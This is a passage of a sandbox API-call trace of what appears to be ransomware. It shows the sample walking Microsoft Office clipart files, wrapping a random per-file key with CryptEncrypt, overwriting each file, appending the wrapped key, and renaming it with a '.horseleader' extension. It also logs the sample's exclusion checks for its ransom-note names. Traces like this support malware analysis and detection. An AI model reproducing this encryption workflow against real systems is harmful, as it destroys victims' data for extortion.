[0254.201] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.horseleader") returned 79 [0254.201] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf.horseleader")) returned 1 [0254.202] GetProcessHeap () returned 0x780000 [0254.202] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.202] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xaec, 
dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01146_.WMF", cAlternateFileName="")) returned 1 [0254.202] lstrcmpiW (lpString1="DD01146_.WMF", lpString2="Windows") returned -1 [0254.202] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 67 [0254.202] StrStrIW (lpFirst="DD01146_.WMF", lpSrch=".horseleader") returned 0x0 [0254.202] lstrcmpW (lpString1="DD01146_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.202] lstrcmpW (lpString1="DD01146_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.202] lstrlenW (lpString=".testttjffg") returned 11 [0254.202] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.202] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.203] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.203] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.203] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 67 [0254.203] StrStrW (lpFirst="DD01146_.WMF", lpSrch=".txt") returned 0x0 [0254.203] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2796) returned 1 [0254.204] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesRead=0x32aedf4*=0xaec, lpOverlapped=0x0) returned 1 [0254.206] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff514, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.206] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xaec, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xaec, lpOverlapped=0x0) returned 1 [0254.206] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.206] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.206] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.206] CloseHandle (hObject=0x158) returned 1 [0254.206] GetProcessHeap () returned 0x780000 [0254.206] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.206] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF.horseleader") returned 79 [0254.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf.horseleader")) returned 1 [0254.208] GetProcessHeap () returned 0x780000 [0254.208] HeapFree (in: hHeap=0x780000, dwFlags=0x0, 
lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.208] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb90, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01151_.WMF", cAlternateFileName="")) returned 1 [0254.208] lstrcmpiW (lpString1="DD01151_.WMF", lpString2="Windows") returned -1 [0254.208] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 67 [0254.208] StrStrIW (lpFirst="DD01151_.WMF", lpSrch=".horseleader") returned 0x0 [0254.208] lstrcmpW (lpString1="DD01151_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.208] lstrcmpW (lpString1="DD01151_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.208] lstrlenW (lpString=".testttjffg") returned 11 [0254.208] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.208] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.208] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.209] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.209] lstrlenW 
(lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 67 [0254.210] StrStrW (lpFirst="DD01151_.WMF", lpSrch=".txt") returned 0x0 [0254.210] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2960) returned 1 [0254.210] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xb90, lpOverlapped=0x0) returned 1 [0254.213] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff470, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.213] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xb90, lpOverlapped=0x0) returned 1 [0254.214] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.214] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.214] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.214] CloseHandle (hObject=0x158) returned 1 [0254.214] GetProcessHeap () returned 0x780000 [0254.214] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.214] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.horseleader") returned 79 [0254.214] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf.horseleader")) returned 1 [0254.216] GetProcessHeap () returned 0x780000 [0254.216] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.216] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb90, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01152_.WMF", cAlternateFileName="")) returned 1 [0254.216] lstrcmpiW (lpString1="DD01152_.WMF", lpString2="Windows") returned -1 [0254.216] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 67 [0254.216] StrStrIW (lpFirst="DD01152_.WMF", lpSrch=".horseleader") returned 0x0 [0254.216] lstrcmpW (lpString1="DD01152_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.216] lstrcmpW (lpString1="DD01152_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.216] lstrlenW (lpString=".testttjffg") returned 11 [0254.216] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.216] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.216] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.216] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.217] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 67 [0254.217] StrStrW (lpFirst="DD01152_.WMF", lpSrch=".txt") returned 0x0 [0254.217] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2960) returned 1 [0254.217] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xb90, lpOverlapped=0x0) returned 1 [0254.239] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff470, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.239] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xb90, lpOverlapped=0x0) returned 1 [0254.240] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.240] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.240] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.240] CloseHandle 
(hObject=0x158) returned 1 [0254.240] GetProcessHeap () returned 0x780000 [0254.240] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.240] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.horseleader") returned 79 [0254.240] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf.horseleader")) returned 1 [0254.242] GetProcessHeap () returned 0x780000 [0254.242] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.333] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe04, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01157_.WMF", cAlternateFileName="")) returned 1 [0254.334] lstrcmpiW (lpString1="DD01157_.WMF", lpString2="Windows") returned -1 [0254.334] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 67 [0254.334] StrStrIW (lpFirst="DD01157_.WMF", lpSrch=".horseleader") returned 0x0 [0254.334] lstrcmpW (lpString1="DD01157_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.334] lstrcmpW (lpString1="DD01157_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.334] lstrlenW 
(lpString=".testttjffg") returned 11 [0254.334] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.334] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.334] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.334] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.338] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 67 [0254.338] StrStrW (lpFirst="DD01157_.WMF", lpSrch=".txt") returned 0x0 [0254.338] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3588) returned 1 [0254.339] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xe04, lpOverlapped=0x0) returned 1 [0254.344] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff1fc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.344] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xe04, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xe04, lpOverlapped=0x0) returned 1 [0254.345] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.345] WriteFile (in: hFile=0x158, 
lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.345] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.345] CloseHandle (hObject=0x158) returned 1 [0254.345] GetProcessHeap () returned 0x780000 [0254.345] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.346] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.horseleader") returned 79 [0254.346] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf.horseleader")) returned 1 [0254.347] GetProcessHeap () returned 0x780000 [0254.347] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.348] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8b4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01160_.WMF", cAlternateFileName="")) returned 1 [0254.348] lstrcmpiW (lpString1="DD01160_.WMF", lpString2="Windows") returned -1 [0254.348] 
wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 67 [0254.348] StrStrIW (lpFirst="DD01160_.WMF", lpSrch=".horseleader") returned 0x0 [0254.348] lstrcmpW (lpString1="DD01160_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.348] lstrcmpW (lpString1="DD01160_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.348] lstrlenW (lpString=".testttjffg") returned 11 [0254.348] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.349] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.349] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.349] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.350] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 67 [0254.350] StrStrW (lpFirst="DD01160_.WMF", lpSrch=".txt") returned 0x0 [0254.350] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2228) returned 1 [0254.350] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x8b4, lpOverlapped=0x0) returned 1 [0254.354] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff74c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0254.354] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x8b4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x8b4, lpOverlapped=0x0) returned 1 [0254.354] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.355] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.355] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.355] CloseHandle (hObject=0x158) returned 1 [0254.355] GetProcessHeap () returned 0x780000 [0254.355] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.356] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.horseleader") returned 79 [0254.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf.horseleader")) returned 1 [0254.357] GetProcessHeap () returned 0x780000 [0254.357] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.357] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, 
ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8fc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01162_.WMF", cAlternateFileName="")) returned 1 [0254.357] lstrcmpiW (lpString1="DD01162_.WMF", lpString2="Windows") returned -1 [0254.357] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 67 [0254.357] StrStrIW (lpFirst="DD01162_.WMF", lpSrch=".horseleader") returned 0x0 [0254.357] lstrcmpW (lpString1="DD01162_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.357] lstrcmpW (lpString1="DD01162_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.357] lstrlenW (lpString=".testttjffg") returned 11 [0254.358] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.358] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.358] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.358] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 